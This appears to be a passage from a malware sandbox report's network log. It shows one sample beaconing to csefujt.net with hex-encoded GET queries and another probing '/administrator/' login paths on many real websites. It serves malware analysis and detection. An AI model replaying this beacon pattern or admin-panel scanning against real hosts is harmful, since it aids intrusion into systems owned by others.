                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:47.642812014 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                134192.168.2.649879185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:47.980295897 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.227332115 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                135192.168.2.650366185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.789340973 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.026035070 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                136192.168.2.654606172.203.148.3480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.161045074 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.277880907 CET158INHTTP/1.1 302 Found : Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://eei.uniandes.edu.co/administrator/
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                137192.168.2.654610104.18.41.15380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.163181067 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.312803030 CET295INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb67d897b08e-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.480509043 CET229OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://app.plex.tv/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.623760939 CET304INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7c9bf6b08e-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                138192.168.2.654633104.17.62.5080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.182869911 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.faceit.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.318861008 CET760INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.faceit.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=WOxY2xKuaHEWhpJdZbP8rYzPhqjxld0MRCoNGeMXxSA-1707131690-1-ASZC69vX9PZEW30evFqsmb62Z5bDn8mYBr6CbmI0VqzV1mSTOHl6rgXG45B79c4NcZ9/YaaacrgDueS+m5gH19l9nHYYNI8/ocLI4P15BnxY; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.faceit.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=9GErBnItLnve1YgUyrQ2mg9oJPZqDyYBMAZDgAa73MA-1707131690253-0-604800000; path=/; domain=.faceit.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb67ff077bab-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.170186043 CET454OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.faceit.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: _cfuvid=9GErBnItLnve1YgUyrQ2mg9oJPZqDyYBMAZDgAa73MA-1707131690253-0-604800000; __cf_bm=WOxY2xKuaHEWhpJdZbP8rYzPhqjxld0MRCoNGeMXxSA-1707131690-1-ASZC69vX9PZEW30evFqsmb62Z5bDn8mYBr6CbmI0VqzV1mSTOHl6rgXG45B79c4NcZ9/YaaacrgDueS+m5gH19l9nHYYNI8/ocLI4P15BnxY
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.297420025 CET363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.faceit.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42eb4a7bab-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                139192.168.2.65465531.13.65.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.184695959 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pl-pl.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.286451101 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://pl-pl.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.888422012 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pl-pl.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.990487099 CET220INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://pl-pl.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                140192.168.2.65478064.91.249.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.280335903 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.424928904 CET359INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                141192.168.2.65475754.71.181.16080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315619946 CET185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.487653017 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.487668991 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.490597963 CET248OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ucivirtual.uci.edu.mx/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.670378923 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
